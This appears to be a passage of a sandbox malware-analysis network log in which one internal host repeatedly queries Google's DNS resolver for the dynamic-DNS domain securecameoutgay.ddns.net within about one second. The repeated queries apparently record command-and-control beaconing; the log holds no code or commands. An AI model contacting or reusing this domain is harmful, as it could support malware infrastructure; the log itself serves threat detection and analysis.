                                                    Oct 12, 2024 23:05:52.405265093 CEST192.168.2.148.8.8.80x2786Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.412125111 CEST192.168.2.148.8.8.80x2786Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.419171095 CEST192.168.2.148.8.8.80xb218Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.426083088 CEST192.168.2.148.8.8.80xb218Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.432893991 CEST192.168.2.148.8.8.80xb218Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.439812899 CEST192.168.2.148.8.8.80xb218Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.447361946 CEST192.168.2.148.8.8.80xb218Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.454395056 CEST192.168.2.148.8.8.80x9778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.461390972 CEST192.168.2.148.8.8.80x9778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.468302965 CEST192.168.2.148.8.8.80x9778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.475153923 CEST192.168.2.148.8.8.80x9778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.482309103 CEST192.168.2.148.8.8.80x9778Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.489521027 CEST192.168.2.148.8.8.80x76bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.496153116 CEST192.168.2.148.8.8.80x76bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.502882957 CEST192.168.2.148.8.8.80x76bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.509785891 CEST192.168.2.148.8.8.80x76bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.516371012 CEST192.168.2.148.8.8.80x76bdStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.523439884 CEST192.168.2.148.8.8.80xc9e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.530211926 CEST192.168.2.148.8.8.80xc9e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.538058996 CEST192.168.2.148.8.8.80xc9e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.544538975 CEST192.168.2.148.8.8.80xc9e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.551254988 CEST192.168.2.148.8.8.80xc9e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.558311939 CEST192.168.2.148.8.8.80x8532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.565644026 CEST192.168.2.148.8.8.80x8532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.572340965 CEST192.168.2.148.8.8.80x8532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.579480886 CEST192.168.2.148.8.8.80x8532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.586153984 CEST192.168.2.148.8.8.80x8532Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.593189955 CEST192.168.2.148.8.8.80xc500Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.599703074 CEST192.168.2.148.8.8.80xc500Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.606257915 CEST192.168.2.148.8.8.80xc500Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.612798929 CEST192.168.2.148.8.8.80xc500Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.619671106 CEST192.168.2.148.8.8.80xc500Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.626048088 CEST192.168.2.148.8.8.80x2eadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.633013010 CEST192.168.2.148.8.8.80x2eadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.639750957 CEST192.168.2.148.8.8.80x2eadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.646703959 CEST192.168.2.148.8.8.80x2eadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.653649092 CEST192.168.2.148.8.8.80x2eadStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.660597086 CEST192.168.2.148.8.8.80x538eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.667301893 CEST192.168.2.148.8.8.80x538eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.673876047 CEST192.168.2.148.8.8.80x538eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.682624102 CEST192.168.2.148.8.8.80x538eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.689516068 CEST192.168.2.148.8.8.80x538eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.696365118 CEST192.168.2.148.8.8.80xae25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.703290939 CEST192.168.2.148.8.8.80xae25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.710079908 CEST192.168.2.148.8.8.80xae25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.716806889 CEST192.168.2.148.8.8.80xae25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.723728895 CEST192.168.2.148.8.8.80xae25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.730571032 CEST192.168.2.148.8.8.80x90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.737349033 CEST192.168.2.148.8.8.80x90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.744157076 CEST192.168.2.148.8.8.80x90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.751144886 CEST192.168.2.148.8.8.80x90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.758235931 CEST192.168.2.148.8.8.80x90Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.765393972 CEST192.168.2.148.8.8.80x7896Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.772077084 CEST192.168.2.148.8.8.80x7896Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.779241085 CEST192.168.2.148.8.8.80x7896Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.786173105 CEST192.168.2.148.8.8.80x7896Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.792773008 CEST192.168.2.148.8.8.80x7896Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.799649954 CEST192.168.2.148.8.8.80x4557Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.806541920 CEST192.168.2.148.8.8.80x4557Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.813514948 CEST192.168.2.148.8.8.80x4557Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.820218086 CEST192.168.2.148.8.8.80x4557Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.826769114 CEST192.168.2.148.8.8.80x4557Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.833218098 CEST192.168.2.148.8.8.80x3770Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.840003967 CEST192.168.2.148.8.8.80x3770Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.846884012 CEST192.168.2.148.8.8.80x3770Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.853662968 CEST192.168.2.148.8.8.80x3770Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.860630989 CEST192.168.2.148.8.8.80x3770Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.867189884 CEST192.168.2.148.8.8.80x34d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.873883009 CEST192.168.2.148.8.8.80x34d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.880598068 CEST192.168.2.148.8.8.80x34d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.887212038 CEST192.168.2.148.8.8.80x34d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.893902063 CEST192.168.2.148.8.8.80x34d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.900727034 CEST192.168.2.148.8.8.80xefd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.907351971 CEST192.168.2.148.8.8.80xefd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.914220095 CEST192.168.2.148.8.8.80xefd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.921359062 CEST192.168.2.148.8.8.80xefd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.928114891 CEST192.168.2.148.8.8.80xefd2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.935324907 CEST192.168.2.148.8.8.80x29e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.941618919 CEST192.168.2.148.8.8.80x29e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.948471069 CEST192.168.2.148.8.8.80x29e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.954828024 CEST192.168.2.148.8.8.80x29e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.961566925 CEST192.168.2.148.8.8.80x29e8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.968219995 CEST192.168.2.148.8.8.80x1e3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.974981070 CEST192.168.2.148.8.8.80x1e3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.981643915 CEST192.168.2.148.8.8.80x1e3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.988029957 CEST192.168.2.148.8.8.80x1e3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.994508028 CEST192.168.2.148.8.8.80x1e3fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.000977993 CEST192.168.2.148.8.8.80xf63bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.007913113 CEST192.168.2.148.8.8.80xf63bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.014426947 CEST192.168.2.148.8.8.80xf63bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.020942926 CEST192.168.2.148.8.8.80xf63bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.027745008 CEST192.168.2.148.8.8.80xf63bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.034354925 CEST192.168.2.148.8.8.80xc6b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.040899992 CEST192.168.2.148.8.8.80xc6b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.047244072 CEST192.168.2.148.8.8.80xc6b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.053750992 CEST192.168.2.148.8.8.80xc6b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.060307980 CEST192.168.2.148.8.8.80xc6b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.067838907 CEST192.168.2.148.8.8.80xb4d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.074723959 CEST192.168.2.148.8.8.80xb4d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.081526041 CEST192.168.2.148.8.8.80xb4d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.088160992 CEST192.168.2.148.8.8.80xb4d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.094764948 CEST192.168.2.148.8.8.80xb4d6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.102941036 CEST192.168.2.148.8.8.80x2ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.110102892 CEST192.168.2.148.8.8.80x2ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.117090940 CEST192.168.2.148.8.8.80x2ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.123492956 CEST192.168.2.148.8.8.80x2ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.131268024 CEST192.168.2.148.8.8.80x2ff3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.138019085 CEST192.168.2.148.8.8.80x3df3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.144733906 CEST192.168.2.148.8.8.80x3df3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.151137114 CEST192.168.2.148.8.8.80x3df3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.158133030 CEST192.168.2.148.8.8.80x3df3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.165043116 CEST192.168.2.148.8.8.80x3df3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.172161102 CEST192.168.2.148.8.8.80xf687Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.178857088 CEST192.168.2.148.8.8.80xf687Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.185379982 CEST192.168.2.148.8.8.80xf687Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.197472095 CEST192.168.2.148.8.8.80xf687Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.204149008 CEST192.168.2.148.8.8.80xf687Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.211111069 CEST192.168.2.148.8.8.80x2f4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.218250036 CEST192.168.2.148.8.8.80x2f4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.225121975 CEST192.168.2.148.8.8.80x2f4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.232134104 CEST192.168.2.148.8.8.80x2f4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.239037991 CEST192.168.2.148.8.8.80x2f4dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.246031046 CEST192.168.2.148.8.8.80xddfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.254573107 CEST192.168.2.148.8.8.80xddfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.261194944 CEST192.168.2.148.8.8.80xddfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.267972946 CEST192.168.2.148.8.8.80xddfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.275011063 CEST192.168.2.148.8.8.80xddfStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.281677008 CEST192.168.2.148.8.8.80xed2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.288537979 CEST192.168.2.148.8.8.80xed2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.295336008 CEST192.168.2.148.8.8.80xed2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.301989079 CEST192.168.2.148.8.8.80xed2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.308855057 CEST192.168.2.148.8.8.80xed2eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.316247940 CEST192.168.2.148.8.8.80xa25bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.323301077 CEST192.168.2.148.8.8.80xa25bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.330391884 CEST192.168.2.148.8.8.80xa25bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.337126970 CEST192.168.2.148.8.8.80xa25bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.344160080 CEST192.168.2.148.8.8.80xa25bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.351017952 CEST192.168.2.148.8.8.80x20b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.357587099 CEST192.168.2.148.8.8.80x20b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.364356041 CEST192.168.2.148.8.8.80x20b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.371489048 CEST192.168.2.148.8.8.80x20b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.378159046 CEST192.168.2.148.8.8.80x20b3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.385247946 CEST192.168.2.148.8.8.80xe891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.392323971 CEST192.168.2.148.8.8.80xe891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.399595976 CEST192.168.2.148.8.8.80xe891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.406497002 CEST192.168.2.148.8.8.80xe891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.413665056 CEST192.168.2.148.8.8.80xe891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.420125961 CEST192.168.2.148.8.8.80x8219Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.426894903 CEST192.168.2.148.8.8.80x8219Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.433475971 CEST192.168.2.148.8.8.80x8219Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.440790892 CEST192.168.2.148.8.8.80x8219Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.447427988 CEST192.168.2.148.8.8.80x8219Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.454358101 CEST192.168.2.148.8.8.80x7c67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.461123943 CEST192.168.2.148.8.8.80x7c67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.468669891 CEST192.168.2.148.8.8.80x7c67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.475939035 CEST192.168.2.148.8.8.80x7c67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.482597113 CEST192.168.2.148.8.8.80x7c67Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.489259005 CEST192.168.2.148.8.8.80xdc6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.496481895 CEST192.168.2.148.8.8.80xdc6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.503451109 CEST192.168.2.148.8.8.80xdc6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.510081053 CEST192.168.2.148.8.8.80xdc6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.517117023 CEST192.168.2.148.8.8.80xdc6aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.524213076 CEST192.168.2.148.8.8.80xf7e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.531346083 CEST192.168.2.148.8.8.80xf7e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.539900064 CEST192.168.2.148.8.8.80xf7e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.546612024 CEST192.168.2.148.8.8.80xf7e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.553263903 CEST192.168.2.148.8.8.80xf7e7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.560524940 CEST192.168.2.148.8.8.80x4798Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.568284988 CEST192.168.2.148.8.8.80x4798Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.576719999 CEST192.168.2.148.8.8.80x4798Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.583769083 CEST192.168.2.148.8.8.80x4798Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.593291998 CEST192.168.2.148.8.8.80x4798Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.599916935 CEST192.168.2.148.8.8.80x3eeaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.607058048 CEST192.168.2.148.8.8.80x3eeaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.613679886 CEST192.168.2.148.8.8.80x3eeaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.620758057 CEST192.168.2.148.8.8.80x3eeaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.627824068 CEST192.168.2.148.8.8.80x3eeaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.635317087 CEST192.168.2.148.8.8.80xb76Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.642328978 CEST192.168.2.148.8.8.80xb76Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.648828030 CEST192.168.2.148.8.8.80xb76Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.655419111 CEST192.168.2.148.8.8.80xb76Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.662060976 CEST192.168.2.148.8.8.80xb76Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.668807030 CEST192.168.2.148.8.8.80xcb50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.675609112 CEST192.168.2.148.8.8.80xcb50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.683119059 CEST192.168.2.148.8.8.80xcb50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.689917088 CEST192.168.2.148.8.8.80xcb50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.696919918 CEST192.168.2.148.8.8.80xcb50Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:53.703833103 CEST192.168.2.148.8.8.80xcd5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
